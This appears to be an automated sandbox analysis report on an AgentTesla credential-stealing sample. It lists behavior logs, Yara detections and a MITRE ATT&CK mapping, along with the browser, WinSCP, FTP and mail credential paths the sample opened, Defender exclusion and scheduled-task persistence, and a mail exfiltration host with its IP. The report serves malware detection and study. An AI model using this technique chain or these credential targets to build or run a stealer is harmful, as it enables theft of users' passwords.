                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeQueries volume information: C:\Users\user\AppData\Roaming\joUXSCpr.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SMBKT-20242005.exe.3e57898.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SMBKT-20242005.exe.3e1cc78.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SMBKT-20242005.exe.3e57898.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SMBKT-20242005.exe.3d79970.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2663210822.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2663210822.000000000310F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2663210822.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1473242520.000000000338C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1473242520.0000000003361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SMBKT-20242005.exe PID: 7376, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8092, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SMBKT-20242005.exe.3e57898.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SMBKT-20242005.exe.3e1cc78.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SMBKT-20242005.exe.3e57898.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SMBKT-20242005.exe.3d79970.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2663210822.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1473242520.0000000003361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SMBKT-20242005.exe PID: 7376, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8092, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SMBKT-20242005.exe.3e57898.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SMBKT-20242005.exe.3e1cc78.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SMBKT-20242005.exe.3e57898.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SMBKT-20242005.exe.3d79970.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2663210822.00000000030FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2663210822.000000000310F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2663210822.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1473242520.000000000338C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1473242520.0000000003361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SMBKT-20242005.exe PID: 7376, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7764, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 8092, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		311
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Scheduled Task/Job                    		3
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		211
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model1
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets141
                    Virtualization/Sandbox Evasion                    		SSHKeylogging23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                    Virtualization/Sandbox Evasion                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1444949 Sample: SMBKT-20242005.exe Startdate: 21/05/2024 Architecture: WINDOWS Score: 100 44 mail.stilbo.eu 2->44 46 api.ipify.org 2->46 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 Sigma detected: Scheduled temp file as task from temp location 2->56 58 8 other signatures 2->58 8 SMBKT-20242005.exe 7 2->8         started        12 joUXSCpr.exe 5 2->12         started        signatures3 process4 file5 40 C:\Users\user\AppData\Roaming\joUXSCpr.exe, PE32 8->40 dropped 42 C:\Users\user\AppData\Local\Temp\tmp6AB.tmp, XML 8->42 dropped 60 Uses schtasks.exe or at.exe to add and modify task schedules 8->60 62 Writes to foreign memory regions 8->62 64 Allocates memory in foreign processes 8->64 66 Adds a directory exclusion to Windows Defender 8->66 14 RegSvcs.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 RegSvcs.exe 8->20         started        22 schtasks.exe 1 8->22         started        68 Multi AV Scanner detection for dropped file 12->68 70 Machine Learning detection for dropped file 12->70 72 Injects a PE file into a foreign processes 12->72 24 RegSvcs.exe 2 12->24         started        26 schtasks.exe 1 12->26         started        28 RegSvcs.exe 12->28         started        30 RegSvcs.exe 12->30         started        signatures6 process7 dnsIp8 48 mail.stilbo.eu 212.44.102.65, 49712, 49716, 587 DHH-ASSI Slovenia 14->48 50 api.ipify.org 104.26.13.205, 443, 49710, 49713 CLOUDFLARENETUS United States 14->50 74 Loading BitLocker PowerShell Module 18->74 32 conhost.exe 18->32         started        34 WmiPrvSE.exe 18->34         started        76 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 20->76 36 conhost.exe 22->36         started        78 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 24->78 80 Tries to steal Mail credentials (via file / registry access) 24->80 82 Tries to harvest and steal ftp login credentials 24->82 84 Tries to harvest and steal browser information (history, passwords, etc) 24->84 38 conhost.exe 26->38         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    SMBKT-20242005.exe37%ReversingLabsByteCode-MSIL.Trojan.GenSteal
                    SMBKT-20242005.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\joUXSCpr.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\joUXSCpr.exe37%ReversingLabsByteCode-MSIL.Trojan.GenSteal

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://api.ipify.org/0%URL Reputationsafe
                    https://api.ipify.org0%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    http://x1.c.lencr.org/00%URL Reputationsafe
                    http://x1.i.lencr.org/00%URL Reputationsafe
                    http://r3.o.lencr.org00%URL Reputationsafe
                    https://api.ipify.org/t0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
                    http://r3.i.lencr.org/00%URL Reputationsafe
                    https://t3.ftcdn.net/jpg/02/48/42/64/360_F_248426448_NVKLywWqArG2ADUxDq6QprtIzsF82dMF.jpgG0%Avira URL Cloudsafe
                    http://mail.stilbo.eu0%Avira URL Cloudsafe
                    http://crl.mS0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mail.stilbo.eu
                    		212.44.102.65
                    		truetrue
                      		unknown
                      api.ipify.org
                      		104.26.13.205
                      		truefalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                        • URL Reputation: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://api.ipify.orgSMBKT-20242005.exe, 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1473242520.0000000003311000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.000000000308C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://account.dyn.com/SMBKT-20242005.exe, 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.mSRegSvcs.exe, 00000008.00000002.1477888050.0000000006510000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://x1.c.lencr.org/0RegSvcs.exe, 0000000F.00000002.2661521200.000000000128A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2660788327.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2669844639.00000000064C2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://x1.i.lencr.org/0RegSvcs.exe, 0000000F.00000002.2661521200.000000000128A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2660788327.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2669844639.00000000064C2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://mail.stilbo.euRegSvcs.exe, 00000008.00000002.1473242520.000000000338C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.00000000030FC000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://r3.o.lencr.org0RegSvcs.exe, 0000000F.00000002.2661521200.000000000128A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2660788327.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2669844639.00000000064C2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
